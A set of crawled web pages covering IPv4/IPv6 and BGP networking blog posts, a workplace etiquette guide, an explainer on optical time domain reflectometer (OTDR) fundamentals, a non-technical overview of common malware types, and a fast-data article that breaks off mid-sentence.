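    print(f"Displayed as {shown!r} but actually points to {real!r}")
```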
<urn:uuid:39c0e9fa-9a9a-4400-9d75-498d4a06f47c>
CC-MAIN-2022-40
https://www.barracuda.com/glossary/phishing-campaign?utm_source=51426&utm_medium=blog&utm_campaign=blog
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00051.warc.gz
en
0.926346
959
3.390625
3
According to AfriNIC, APNIC, ARIN, LACNIC and RIPE NCC statistics as published on their respective FTP servers, they gave out 165.45 million IPv4 addresses in 2005. Out of 3706.65 million usable IPv4 addresses, 1468.61 million are still available as of January 1, 2006.

Read the article - posted 2006-01-01

Some people, such as D.J. Bernstein in his The IPv6 mess article and Todd Underwood in his Bashing IPv6 at TelecomNEXT blog post, argue that the IETF made a critical mistake when creating IPv6 by not making the protocol "compatible" with IPv4. What they mean is that a system that only runs IPv6 can't communicate with a system that only runs IPv4. That indeed seems like a significant oversight: without this, it's necessary to run parallel networks for a long time, and there must be a significant amount of logic to determine which of the two protocols can and should be used for a particular communication session.

The alternative seems so easy: just reserve some space for the 32-bit IPv4 address space somewhere in the enormous 128-bit IPv6 address space. For instance, IPv4 addresses could be expressed as IPv6 addresses where the first 96 bits are zero. This way, an IPv6 host with address 0:0:0:0:0:0:c000:201 (which we are allowed to write down as ::192.0.2.1) can communicate with an IPv4 host with address 10.0.0.1 as long as somewhere along the way, there is a router or gateway that takes the IPv6 packet and transforms it into an IPv4 packet or the other way around, a fairly simple process. At the same time, our IPv6 host with address ::192.0.2.1 can communicate with another IPv6 host that has 3ffe:2500:310:4::1 (well, for the rest of today, at least...) as per IPv6 conventions.

But... The problems start when 3ffe:2500:310:4::1 wants to communicate with 10.0.0.1. When the IPv6 packet arrives at the IPv6-to-IPv4 gateway, the 3ffe:2500:310:4::1 IPv6 address can't be translated into a 32-bit IPv4 address without loss of information. So hosts with "real" IPv6 addresses can't communicate with IPv4 hosts. Even worse, there is no way to determine whether a given IPv4-compatible address belongs to an IPv4 host or an IPv6 host. It gets really bad when a host can do IPv6, but it doesn't have IPv6 connectivity to the rest of the internet.

The solution is to forget IPv4-compatible addresses for IPv6 hosts. If an IPv6 host is going to get an IPv4 address in the first place, it's much simpler to let the IPv6 host generate IPv4 packets where appropriate. So such a host would simply have an IPv6 address to communicate over IPv6 and an IPv4 address to communicate over IPv4. Communication between IPv6-only and IPv4-only hosts can be accomplished using a gateway as outlined above, with the addition of NAT functionality to allow multiple IPv6 hosts behind a gateway to share the gateway's IPv4 address. This is called NAT-PT (Network Address Translation - Protocol Translation) and it has the same downsides as regular NAT in that IPv6 hosts can connect to IPv4 servers, but not the other way around.

So IPv6 is more compatible with IPv4 than many people think. Todd Underwood concludes that "IPv6 is dead, and I think pretty much everyone already knows it" and "I guess that's just about enough time for the stubborn IPv6 camp to admit they're wrong and for all of us to come together and make something that we can easily migrate to." It continues to amaze me in what a hurry people are to declare defeat.
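(As an aside, the address embedding discussed above is easy to experiment with using Python's standard ipaddress module. The snippet below is an illustration added for this write-up, not something from the original post.)

```python
# Sketch of the "embed IPv4 in the low 32 bits of IPv6" idea discussed above,
# using Python's standard ipaddress module.
import ipaddress

v4 = ipaddress.IPv4Address("192.0.2.1")

# IPv4-compatible form: first 96 bits zero, IPv4 address in the last 32 bits.
compatible = ipaddress.IPv6Address(int(v4))
print(compatible)                              # ::c000:201, i.e. ::192.0.2.1

# Going back is lossless for these special addresses...
print(ipaddress.IPv4Address(int(compatible)))  # 192.0.2.1

# ...but a "real" IPv6 address simply does not fit in 32 bits, which is the
# information-loss problem described above.
real_v6 = ipaddress.IPv6Address("3ffe:2500:310:4::1")
print(int(real_v6) > 2**32 - 1)                # True: no lossless mapping to IPv4
```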
I think Todd and others who think along the same lines massively underestimate the amount of time and effort a project like this takes. It's debatable at what point IPv6 was (or will be) mature enough to replace IPv4, but I don't think anyone can seriously maintain that it reached this point before 2002. So that's at least 7 years between publication of the first RFCs and barely adequate maturity. By extension, any new effort won't be ready before 2013. I also fail to see what the critical difference between IPv6 and any new protocol could be: obviously, it has to stay fairly close to the IP we know to avoid unnecessary complications (which IPv6 does, for the most part at least) and even more obviously, it must support longer addresses (which IPv6 certainly does). So how would the new protocol be so much better to warrant the effort?

Permalink - posted 2006-06-06

FUJIFILM FinePix S9500 f/3.2, 1/42, ISO 200, 8.6 mm (2006:06:23 21:11:39)
Image link - posted 2006-06-23

FUJIFILM FinePix S9500 f/4.1, 1/450, ISO 80, 39 mm (2006:08:13 19:51:13)
Image link - posted 2006-08-13

Last week, ARIN, the organization in charge of distributing IP addresses in North America, changed its IPv6 address policy so it's now possible to get Provider Independent (PI) IPv6 address space. According to the ARIN Number Resource Policy Manual:

This is both good news and bad news. The good news is that if (in the ARIN region) you are currently connected to two or more ISPs for IPv4, you can now do this in much the same way with IPv6. Since IPv6 routing is almost identical to IPv4 routing, all of this should be fairly easy. However, since both the routing protocols (including BGP) and the rules for getting address space are now mostly the same, this means that in the future, IPv6 routing will suffer from the same problems that have been plaguing IPv4 inter-domain routing: a "global routing table" that is much larger than necessary, requiring network operators to invest in bigger routers and causing unnecessary instability. It also means that multihoming (the practice of connecting to two or more ISPs) will never be possible for truly large numbers of internet users.

The Internet Engineering Task Force has been working on alternative ways to gain multihoming benefits in the multi6 and shim6 working groups. But the ARIN constituents decided not to wait for the completion of this work, which will likely have the effect that the shim6 mechanisms won't be adopted widely or quickly when they become available. One reason cited for moving ahead with a known problematic solution for multihoming was the statement by some organizations that they wouldn't adopt IPv6 in the absence of a multihoming solution. Prediction: they won't implement IPv6 with multihoming anytime soon either. And unfortunately ARIN (and the other RIRs) still claim that you can filter out any IPv6 prefixes longer than /32 even though they give out micro allocations and now PI blocks that are longer than that, mostly /48. See my article from nearly three years ago.

Permalink - posted 2006-09-05

Iljitsch van Beijnum
The Internet Protocol Journal, Vol. 9, no. 3, pp. 16-29, September

The BGP TCP MD5 password mechanism (RFC 2385) is very useful to protect BGP sessions from attempts at unpleasantness by third parties. However, it is rather simplistic. One of the flaws is that there are no provisions for changing the password. In the old days, setting a new password for a neighbor would cause Cisco routers to tear down and reestablish the BGP session.
Today, the session survives if the password or key is changed at more or less the same time at both ends. This requires a good deal of coordination. I must say that I can't remember anyone asking me to change an existing BGP password. But the security people insist that it's important to do this regularly, for instance, when employees leave. I think they have a different appreciation of the sensitivity of this key than those of us working in operations.

Anyway, Steve Bellovin, a well-known member of the IETF, has written this "internet draft" and submitted it for publication as an RFC:
http://www.ietf.org/internet-drafts/draft-bellovin-keyroll2385-03.txt (will be deleted after 6 months)

What he proposes is that a router can have more than one active key, so it's possible for one end to change keys and the other end to go along with this without the need to coordinate the password change very closely. Unfortunately, it's still possible to configure the wrong key, or forget to change the key after agreeing to do so, and then the BGP session will go down at some point, probably conveniently in the middle of the night. See my posting to the IETF discussion list for details. Well, progress isn't always progress, I guess. If you have any opinions on the matter, email me.

Permalink - posted 2006-09-30

Canon PowerShot A40 f/4.5, 10/10, ISO ---, 13 mm (2006:10:29 18:21:59)
Image link - posted 2006-10-29

The other day, I was sitting in a hotel lobby waiting for some people, working on my laptop. There I had the following conversation: "Hey, is there a wireless network here?" "Then how are you working?" "I'm working offline."

In this age of AJAX, webmail, instant messaging and YouTube videos, working offline seems so 1980s. I guess this means I'm getting old, because I'm much more comfortable having my stuff (or at least, copies of my stuff) on local storage, so I have access to it regardless of my connectivity, and there is at least a fighting chance that an application that works today still works tomorrow.

Interestingly, Microsoft, a company that makes billions selling software that makes computers useful whether or not they're connected (Office), has jumped on the web-based applications bandwagon. Apparently they don't see that web-based applications make Microsoft obsolete: all you need to run them is Linux and Firefox. Apple, on the other hand, seems to focus on applications that work best locally. Long after the majority of Office users have switched to free or cheap web-based alternatives, possibly discarding Windows in the process, creative professionals (and hobbyists) will still be buying Apple hard- and software to do their audio, video and image editing.

(Originally published on the Apress blog, which is now gone.)

Permalink - posted 2006-11-06

If you want to use the BGP routing protocol, you need an Autonomous System number. These AS numbers were 16 bits in size until now, allowing for around 64000 ASes, and more than half of those have been given out already. To avoid problems when we run out of AS numbers, the IETF came up with modifications to BGP to allow for 32-bit AS numbers, as I explained in a posting about a year ago. Obviously, at some point someone has to bite the bullet and start using one of these new AS numbers. This bullet biting may happen fairly soon, as the five Regional Internet Registries have all adopted, or are in the process of adopting, the following policy:

So what does this mean for people who run BGP today?
Not all that much, really, because the changes to BGP to support the longer AS numbers are completely backward compatible. The only change is that you'll see the AS number 23456 appear in more and more places. In routers that don't yet support 32-bit ASes, the special 16-bit AS number 23456 shows up as a placeholder in places where a 32-bit AS is supposed to appear. If you have scripts that perform AS-related operations on the Routing Registries (such as the RIPE database), you'll have to adjust your software to parse the new format for 32-bit AS numbers. They are written down as <16bits>.<16bits>, for instance, 3.1099 is a new 32-bit AS number and 0.23456 is the 32-bit version of AS 23456. However, this format isn't standardized so 32-bit AS numbers may show up differently in your router. Have a look at the RIPE announcement. As soon as the first 32-bit AS number appears in the wild I'll report it here so you can check whether it shows up in its full 32-bit glory or as 23456. In the mean time, you may want to ask your router vendor for 32-bit AS support. At least one of the big vendors isn't implementing it in all of their lines just yet because they claim there is no customer demand for it. Permalink - posted 2006-12-29
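The <16bits>.<16bits> notation is simple to convert in code. The short sketch below is an added illustration of the arithmetic, not part of the original post.

```python
# Sketch of converting between plain 32-bit AS numbers and the <16bits>.<16bits>
# ("asdot") notation mentioned above.
def to_asdot(asn: int) -> str:
    high, low = divmod(asn, 65536)
    return f"{high}.{low}"

def from_asdot(asdot: str) -> int:
    high, low = (int(part) for part in asdot.split("."))
    return high * 65536 + low

print(from_asdot("3.1099"))   # 197707 -- the example 32-bit AS number above
print(to_asdot(23456))        # 0.23456 -- the 16-bit placeholder AS
print(from_asdot("0.23456"))  # 23456
```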
<urn:uuid:e4d93175-f10d-49b1-8eb4-aa75a2b3f91a>
CC-MAIN-2022-40
http://all.iljitsch.com/2006/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.94959
2,784
2.625
3
There is more to prospering in a new role and building a solid, rewarding career than what is written in your resume. Or how you handle yourself in interviews. Ask any successful technologist, working in business means—working with other people. And that means understanding workplace etiquette: the unspoken rules that drive interpersonal dynamics. This understanding and our own application will influence how well – or poorly – we work with other people. First impressions are important wherever you are, whatever you are doing. And the workplace is no exception. Human beings often form first impressions of each other within seconds. And once an impression has been formed, it is hard to change it. If you are starting a new role, or going into a new company, meeting a new customer or team, take some time beforehand to think about how you want to be perceived. Do you want to project confidence? Authority? Do you want others to take you seriously, trust you, and feel straight away that you are dependable? First impressions hinge, oftentimes, on really simple things. Your Personal Signals Such as the way you stand, your body language, eye contact, how you are dressed, whether you smile when you meet someone, alertness, and punctuality. Each of these are cues and indicators that help you project personal attributes that will influence how other people perceive you as a professional. It is also important to understand the cultural norms for your region as business etiquette varies across the world. To help you better understand the rules of engagement, here are tips and hints to keep you straight in business etiquette – and well on track to success, wherever you are in your career. Advice on Improving Your Business Etiquette What is in a Name? Well, plenty. Successful people tend to be those who remember other people’s names. So make an effort to learn them. Repeating someone’s name a few times when you first speak to them, keeping business cards, writing names down in your diary – whatever works for you, remembering a name is a clear sign that you value a colleague, whether they are your superior or subordinate in the hierarchy. Give Respect by Default And talking of hierarchy, if you treat everyone with respect it’s a sign that you are not the kind of person to make judgment calls on the relative importance of the people you work with. Treating people with respect means many things – among them respecting other people’s privacy and personal space. Do not walk into someone’s office without knocking. Do not eavesdrop. Do not be the office gossip. Not only are you likely to cause harm to the people you gossip about, but also it will reflect badly on you. And remember to steer well clear of topics that may cause offence – chief among them: politics and religion. What are Words Worth? Communication. It is essential and yet fraught with all kinds of dangers and pitfalls. As a rule of thumb, re-read your email before you hit send. Every. Single. Time. So many misunderstandings and confusion can be caused by an innocent email. Try this too: avoid saying something in an email that you would not say directly to someone’s face. Re-reading that email will also help you spot any misspellings or typos that will reflect badly on you. And while you are at it, watch your tone. There is very rarely any excuse for bad language in a business context, but even using an informal register or slang can cause offence. If in doubt keep it neutral, keep it professional. 
Ask anyone who has worked in business for any length of time: few things convey a lack of respect for colleagues more emphatically than arriving late for a meeting. If you cannot avoid it, ring ahead or send a message to let colleagues know you are running late. And once you are there, remember two important rules of etiquette: do not take a phone call during a meeting, and do not interrupt others. Be punctual. Be polite. Be prepared.

Our Interconnected World

Increasingly, we work in a globalized environment, becoming more connected with one another each day in the era of digitization. Our colleagues and customers might be anywhere in the world. This opening up of business brings with it all kinds of opportunities to learn and to grow. But it also brings an array of possibilities to get it wrong. It is a very good idea to do some research beforehand if you are traveling to or communicating with business contacts abroad. In most countries a handshake is customary as a business greeting, but in countries like Spain, for instance, it is the norm for men and women to exchange a kiss on the cheek when meeting for the first time – something that would be quite against the rules of etiquette in many countries in the Middle East. Be guided by your own powers of observation, as in any learning process, and if in doubt, ask. With discretion. With respect.

Being successful at work comes down to some of the basic rules we learn in grade school. Be respectful, use your words, and be polite. There are many ways to ensure you are successful at work; there is no single magic combination.
<urn:uuid:3a9f4361-d0e4-4e30-8193-d438f27a2def>
CC-MAIN-2022-40
https://cn.netacad.com/zh-hant/careers/career-advice/essential-skills/workplace-etiquette-and-your-success
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.948043
1,089
2.640625
3
Published on January 13, 2010 The Fundamentals of an OTDR To ensure quality of service (QoS), network constructors, service providers and operators need to accurately pinpoint existing and potential problems, making test and measurement equipment vital. There are a number of test tools available that address the different testing needs at various stages of the network, such as fiber commissioning. Used to reveal the total loss, optical return loss (ORL) and the fiber length, such tests can be performed either on a single fiber or on a complete network. Additionally, a closer examination of the different elements that make up the link under test may be required. Whether to characterize each component of the link, to pinpoint a potential problem with the fiber or to find a fault on your network, the use of an optical time domain reflectometer (OTDR) is inevitable—from fiber network commissioning to troubleshooting and maintenance, an OTDR is the tool of choice. This article explores fundamental OTDR principles that are key in understanding the specifications of this instrument. What Is an OTDR? An OTDR combines a laser source and a detector to provide an inside view of the fiber link. The laser source sends a signal into the fiber where the detector receives the light reflected from the different elements of the link. This produces a trace on a graph made in accordance with the signal received, and a post-analysis event table that contains complete information on each network component is then generated. The signal that is sent is a short pulse that carries a certain amount of energy. A clock then precisely calculates the time of flight of the pulse, and time is converted into distance—knowing the properties of this fiber. As the pulse travels along the fiber, a small portion of the pulse’s energy returns back to the detector due to the reflection of the connections and the fiber itself. When the pulse has entirely returned to the detector, another pulse is sent—until the acquisition time is complete. Therefore, many acquisitions will be performed and averaged in a second to provide a clear picture of the link’s components. After the acquisition has been completed, signal processing is performed to calculate the distance, loss and reflection of each event, in addition to calculating the total link length, total link loss, optical return loss (ORL) and fiber attenuation. The main advantage of using an OTDR is the single-ended test—requiring only one operator and instrument to qualify the link or find a fault in a network. Figure #1 illustrates the block diagram of an OTDR. Reflection is Key As previously examined, the OTDR provides a view of the link by reading the level of light that returns from the pulse that was sent. Note that there are two types of light levels: a constant low level created by the fiber called Rayleigh backscattering and a high-reflection peak at the connection points called Fresnel reflection. Rayleigh backscattering is used to calculate the level of attenuation in the fiber as a function of distance (expressed in dB/km), which is shown by a straight slope in an OTDR trace. This phenomenon comes from the natural reflection and absorption of impurities inside optical fiber. When hit, some particles redirect the light in different directions, creating both signal attenuation and backscattering. Higher wavelengths are less attenuated than shorter ones and, therefore, require less power to travel over the same distance in a standard fiber. 
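As a quick aside before the figures, the time-to-distance conversion described above is easy to sketch numerically. The snippet below is an illustration added to this article summary, not EXFO's implementation; the group index is a typical assumed value for standard singlemode fiber rather than a number taken from the text.

```python
# Sketch of the OTDR time-to-distance conversion described above: light travels
# out and back, so distance = (c / n) * t / 2. The group index of ~1.468 is a
# typical assumed value for standard singlemode fiber, not a figure from the article.
C_VACUUM_M_PER_S = 299_792_458
GROUP_INDEX = 1.468

def event_distance_m(round_trip_time_s: float) -> float:
    speed_in_fiber = C_VACUUM_M_PER_S / GROUP_INDEX
    return speed_in_fiber * round_trip_time_s / 2.0

# A reflection arriving 100 microseconds after the pulse was launched
# corresponds to an event roughly 10.2 km down the fiber.
print(round(event_distance_m(100e-6) / 1000, 1), "km")
```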
Figure 2 illustrates Rayleigh backscattering.

The second type of reflection used by an OTDR—Fresnel reflection—detects physical events along the link. When the light hits an abrupt change in index of refraction (e.g., from glass to air), a higher amount of light is reflected back, creating Fresnel reflection—which can be thousands of times bigger than the Rayleigh backscattering. Fresnel reflection is identifiable by the spikes in an OTDR trace. Examples of such reflections are connectors, mechanical splices, bulkheads, fiber breaks or opened connectors. Figure 3 illustrates different connections that create Fresnel reflections.

What Are Dead Zones?

Fresnel reflections lead to an important OTDR specification known as dead zones. There exist two types of dead zones: event and attenuation. Both originate from Fresnel reflections and are expressed as a distance (meters) that varies according to the power of those reflections. A dead zone is defined as the length of time during which the detector is temporarily blinded by a high amount of reflected light, until it recovers and can read light again—think of when you drive a car at night and you cross another car in the opposite direction; your eyes are blinded for a short period of time. In the OTDR world, time is converted into distance; therefore, more reflection causes the detector to take more time to recover, resulting in a longer dead zone.

Most manufacturers will specify dead zones at the shortest available pulse width and on a -45 dB reflection for singlemode fibers and -35 dB for multimode fibers. For this reason, it is important to read the specification sheet footnotes since manufacturers use different testing conditions to measure the dead zones—pay particular attention to the pulse width and the reflection value. For instance, a -55 dB reflection for singlemode fiber provides a more optimistic specification of a shorter dead zone than using -45 dB, simply because -55 dB is a lower reflection and the detector will recover faster. Using different methods to calculate the distance could also return a shorter dead zone than it really is.

The Event Dead Zone

The event dead zone is the minimum distance after a Fresnel reflection where an OTDR can detect another event. In other words, it is the minimum length of fiber needed between two reflective events. Still using the car example mentioned above, when your eyes are blinded by another car, after a few seconds you could notice an object on the road without being able to properly identify it. In the case of an OTDR, the consecutive event can be detected but the loss cannot be measured (as illustrated in Figure 4). The OTDR merges the consecutive events and returns a global reflection and loss for all merged events. To establish specifications, the most common industry method is to measure the distance at -1.5 dB from each side of the reflective peak (see Figure 5). Another method, which measures the distance from the beginning of the event until the reflection level falls to -1.5 dB from its peak, has also been used. This method returns a longer dead zone, but it is not often used by manufacturers.

Figure 4. Merged event from a long dead zone
Figure 5. Measuring event dead zone

Having the shortest possible event dead zone allows the OTDR to detect closely spaced events in the link. For example, testing in premises networks requires an OTDR with short event dead zones since the patchcords that link the various data centers are extremely short.
If the dead zones are too long, some connectors may be missed and will not be identified by the technicians, which makes it harder to locate a potential problem.

Attenuation Dead Zones

The attenuation dead zone is the minimum distance after a Fresnel reflection where an OTDR can accurately measure the loss of a consecutive event. Still using the above example, after a longer time, your eyes will have recovered enough to identify and analyze the nature of this possible object on the road. As illustrated in Figure 6, the detector has enough time to recover so that it can detect and measure the loss of the consecutive event. The minimum required distance is measured from the beginning of a reflective event until the reflection is back to 0.5 dB over the fiber's backscattering level, as illustrated in Figure 7.

Figure 6. Attenuation dead zone
Figure 7. Measuring attenuation dead zone

The Importance of Dead Zones

Short attenuation dead zones enable the OTDR not only to detect a consecutive event but also to return the loss of closely spaced events. For instance, the loss of a short patchcord within a network can now be known, which helps technicians have a clear picture of what is inside the link. Dead zones are also influenced by another factor: the pulse width. Specifications use the shortest pulse width in order to provide the shortest dead zones. However, dead zones are not always the same length; they stretch as the pulse width increases. Using the longest possible pulse width results in extremely long dead zones, yet this has a different use, as will be examined further on.

The Dynamic Range

An important OTDR parameter is the dynamic range. This parameter reveals the maximum optical loss an OTDR can analyze, from the backscattering level at the OTDR port down to a specific noise level. In other words, it determines the maximum length of fiber that the longest pulse can reach: the bigger the dynamic range (in dB), the longer the distance reached. Evidently, the maximum distance varies from one application to another since the loss of the link under test is different. Connectors, splices and splitters are some of the factors that reduce the maximum length an OTDR can measure. Therefore, averaging for a longer period of time and using the proper distance range is the key to increasing the maximum measurable distance. Most dynamic range specifications are given using the longest pulse width at a three-minute averaging time, with signal-to-noise ratio (SNR) = 1 (averaged level of the root mean square (RMS) noise value). Once again, note that it is important to read the footnotes of a specification for detailed testing conditions.

A good rule of thumb is to choose an OTDR that has a dynamic range that is 5 to 8 dB higher than the maximum loss that will be encountered. For example, a singlemode OTDR with a dynamic range of 35 dB has a usable dynamic range of approximately 30 dB. Assuming typical fiber attenuation of 0.20 dB/km at 1550 nm and splices every 2 km (loss of 0.1 dB per splice), a unit such as this one will be able to accurately certify distances of up to 120 km. The maximum distance can be approximately calculated by dividing the usable dynamic range of the OTDR by the total attenuation per kilometer of the link. This helps determine which dynamic range will enable the unit to reach the end of the fiber. Keep in mind that the more loss there is in the network, the more dynamic range will be required.
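The rule of thumb above is easy to reproduce. The short sketch below (an added illustration, not an EXFO formula) re-derives the 120 km figure from the stated assumptions.

```python
# Re-deriving the ~120 km example above: usable dynamic range divided by the
# total loss per km (fiber attenuation plus averaged splice loss). Illustrative only.
def max_certifiable_distance_km(dynamic_range_db: float,
                                margin_db: float = 5.0,
                                fiber_atten_db_per_km: float = 0.20,
                                splice_loss_db: float = 0.1,
                                splice_spacing_km: float = 2.0) -> float:
    usable_db = dynamic_range_db - margin_db
    loss_per_km = fiber_atten_db_per_km + splice_loss_db / splice_spacing_km
    return usable_db / loss_per_km

print(round(max_certifiable_distance_km(35.0)))  # ~120 km with the values quoted above
```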
Note that a high dynamic range specified at 20 μs does not guarantee a high dynamic range at short pulses—excessive trace filtration could artificially boost dynamic range at all pulses at the cost of a bad fault-finding resolution (this will be explored in-depth in an upcoming article). What Is Pulse Width? The pulse width is actually the time during which the laser is on. As we know, time is converted into distance so that the pulse width has a length. In an OTDR, the pulse carries the energy required to create the backreflection for link characterization. The shorter the pulse, the less energy it carries and the shorter the distance it travels due to the loss along the link (i.e., attenuation, connectors, splices, etc.). A long pulse carries much more energy for use in extremely long fibers. Figure 8 illustrates the pulse width as a function of time. Figure 8. Short pulse vs. long pulse If the pulse is too short, it loses its energy before the end of fiber, causing the backscattering level to become low to the point where the information is lost at the noise floor level. This results in an inability to reach the end of the fiber. Therefore, it is not possible to measure the complete link since the returned end of fiber distance is much shorter than the actual length of the fiber. Another symptom is when the trace becomes too noisy near the end of fiber. The OTDR can no longer proceed with the signal analysis and the measurements may be faulty. Dealing with Pulse Width When the trace gets noisy, there are two easy ways to obtain a cleaner trace. First, the acquisition time can be increased, which results in a considerable improvement (increase) in SNR, while maintaining the good resolution of the short pulse. However, increasing the averaging time has its limits, as it does not improve SNR indefinitely. If the trace is still not sufficiently smooth, then we move on to the second method, which is to use the next available higher pulse (more energy). However, keep in mind that dead zones extend along with the pulse width. Fortunately, most OTDRs on the market have an Auto mode that selects the appropriate pulse width for the fiber under test. This option can be very convenient when the length or loss of the fiber under test is unknown. When characterizing a network or a fiber, it is mandatory to select the right pulse width for the link under test. Short pulse width, short dead zone and low power are used to test short links where events are closely spaced, while a long pulse width, long dead zone and high power are used to reach further distances for longer networks or high-loss networks. Sampling Resolution and Sampling Points The ability for an OTDR to pinpoint the right distance of an event relies on a combination of different parameters—among them are the sampling resolution and the sampling points. Sampling resolution is defined as “the minimum distance between two consecutive sampling points acquired by the instrument”. This parameter is crucial, as it defines the ultimate distance accuracy and fault-finding capability of the OTDR. Depending on the selected pulse width and distance range, this value could vary from 4 cm up to a few meters. Consequently, there must be a high number of sampling points taken during an acquisition to maintain the best possible resolution. Figure 9a and 9b illustrate the role that high resolution plays in fault-finding. 
As illustrated above, having a high number of points results in a higher resolution (short distance between points), which is the ultimate condition for fault-finding.

Figure 9: Resolution vs. fault-finding efficiency: (a) 5-meter resolution (higher resolution); (b) 15-meter resolution (lower resolution)

There are numerous OTDR models available on the market, addressing different test and measurement needs—from basic fault finders to advanced instruments. To make the right choice, fundamental parameters must be considered when purchasing an OTDR, since selecting a unit only based on overall performance and price will lead to problems if the model selected is inappropriate for the application. An OTDR has complex specifications, and most of them entail trade-offs. A solid understanding of these parameters and how to verify them will help buyers make the right choice for their needs—maximizing productivity and cost efficiency.

Our next OTDR article will examine other important parameters such as measurement range, linearity and how to measure and compare dynamic range; it will also take an in-depth look at macrobends, as well as the different limitations of the OTDR.
<urn:uuid:7c883107-b20a-457c-ad8c-680cd5eb3879>
CC-MAIN-2022-40
https://www.exfo.com/en/resources/blog/fundamentals-otdr/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.921137
3,076
3.515625
4
Malware is malicious software that is designed to cause disruption to an IT system, leak private information, or extort the victim in some way. As you can imagine, organizations are very keen to protect their systems from malware attacks due to the costs associated with them. However, given that most malware attacks are the result of human error, there aren’t yet any fool-proof techniques for preventing them. Once a system has been infected with malware, any number of undesirable events can unfold. To make matters worse, some forms of malware operate in a very covert manner and are thus able to go undetected for several months, perhaps even longer. Malware typically arrives in the form of an email attachment, although in some cases the victim will be sent a link to a malicious website, where they will be tricked into downloading/executing a script or handing over their credentials. Anyone can potentially fall victim to a malware attack, including IT professionals, as all it takes is one accidental click. While reports have suggested that some types of malware are on the decline, ransomware, phishing sites, cryptojacking and IoT malware are on the rise. However, it’s worth noting that in the wake of the pandemic there was a surge in the number of malware infections, as cybercriminals saw it as an opportunity to exploit vulnerable employees. As organizations continue to adapt to such changes, their defense against malware attacks will inevitably improve. The Most Common Types of Malware Attacks Adware is a type of malicious software that displays unwanted advertisements on your computer. Although it is relatively harmless, it can be very annoying for the victim, and many adware programs will slow down the victim’s computer. In some cases, the adware will install other malware programs in the background, such as viruses or spyware. A virus is a general form of malware that is designed to infect your system and then spread to other systems. Viruses typically arrive in the form of an email attachment, and once executed, can corrupt, encrypt, steal or delete the files on your system. A worm is a type of malware that is designed to copy itself and spread from one computer to the next, and it can do so without any human interaction. In many cases, the worm script will simply replicate itself in order to deplete a system of its resources. Worms can also modify and delete files, as well as install additional forms of malware onto the system. A trojan derives its name from the legendary “Trojan Horse”, which instead of being a gift, turned out to be malicious. Unlike a virus or a worm, a trojan relies on the user to execute the application and usually arrives via social engineering. Bots are small programs that perform automated tasks, often without the need for human intervention. Bots are often used to perform distributed denial of service attacks (DDoS), which is where the bots are installed on a large number of devices, often without the device owner’s knowledge. Hackers then use these bots to launch a large-scale attack on a given target, which includes flooding the target with traffic in an attempt to cause disruption. Ransomware is arguably the most formidable form of malware, perhaps because it is the most profitable. Once the ransomware script has been executed on the victim’s device, the script will begin encrypting their files. 
At which point, they will be presented with a message informing them that their files have been encrypted and that they must pay a ransom in order to get their files back. In some cases, the attackers will threaten to publicly release the victim’s files unless a payment is made. Spyware, as the name would suggest, is a form of malware that is designed to spy on its victims. A common use of spyware is to log the keystrokes of the victim or monitor their activity in some way to obtain credentials or some other type of personal information. 8. Fileless Malware Unlike other forms of malware, fileless malware doesn’t rely on files to infect a victim’s device. Instead, it exploits tools that already exist on their devices, such as PowerShell, WMI, Microsoft Office macros, and more. Since fileless malware doesn’t leave a footprint, it is a lot harder to detect.
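One reason fileless malware is harder to detect is that traditional, signature-based scanning hashes files on disk and compares them with known-bad fingerprints, roughly as in the sketch below (a simplified illustration, not any product's detection logic; the blocklist hashes and folder path are placeholders). When nothing is written to disk, this kind of check has nothing to inspect.

```python
# Simplified illustration of file-hash (signature) scanning, to show why a
# fileless attack leaves nothing for this approach to examine. The blocklist
# entries and path below are placeholders, not real malware signatures.
import hashlib
from pathlib import Path

KNOWN_BAD_SHA256 = {
    "0" * 64,   # placeholder hash of a known-bad sample
    "f" * 64,   # placeholder hash of another known-bad sample
}

def sha256_of(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan(directory: Path) -> None:
    for file in directory.rglob("*"):
        if file.is_file() and sha256_of(file) in KNOWN_BAD_SHA256:
            print(f"Known-bad file detected: {file}")

scan(Path("./downloads"))   # hypothetical folder of saved email attachments
```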
<urn:uuid:22e1433f-67e6-4aba-9a96-9c48d93689d9>
CC-MAIN-2022-40
https://www.lepide.com/blog/what-is-malware-common-malware-types/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00051.warc.gz
en
0.957229
922
3.453125
3
“Data is the fuel of this new economy. In fact, I would venture to say that for almost any organization today, after its associates, data is the biggest asset.” — Dev Ganguly, CIO, Jackson National Life Insurance Company (from the Inspired Execution podcast) You won’t get many arguments from CIOs about the importance of data to the modern enterprise. And amid the broad spectrum of data types that power business today, one that keeps rising in importance is fast data. More than three-quarters of modern enterprises use real-time, actionable data for at least some of their applications, according to Forrester Research. In noting fast data’s strategic importance, the analyst firm also highlights the challenges involved with getting the most out of it. In this article, I’ll walk you through what makes fast data unique among other operational data types, and what’s required of enterprises to take full advantage of it. Beyond operational data Data managed by enterprises has historically been categorized into two major buckets: “operational” and “analytical.” Analytical databases—think data warehouses or data lakes—serve to analyze static, historical data to help determine patterns retroactively, understand the past, and attempt to predict the future. Operational data, on the other hand, includes more immediate, transactional data—the data needed to run a business day-to-day, like Inventory and purchase data. As large enterprises increasingly need to rapidly ingest, interact with, and react in real time to data that’s generated by applications at scale and speed, another type of data is emerging: “fast data.” Analysts and other industry observers often lump fast data into the operational bucket—but it has distinct use cases that set it apart from other kinds of operational data. Fast data enables full-circle delivery of data that is “in motion.” In other words, it’s generated and consumed instantly by interactive applications running on large numbers of devices. Fast data enables organizations to act on insights gained from user interactions as these insights are generated at the point of the interaction. And because decisions or actions take place right at the front-end, fast data architectures are, by definition, distributed and real-time. Big versus fast Big data is focused on capturing data, storing it, and processing it periodically in batches. A fast data architecture, on the other hand, processes events in real time. Big data focuses on volume, while with fast data, the emphasis is on velocity. Here’s an example. A credit card company 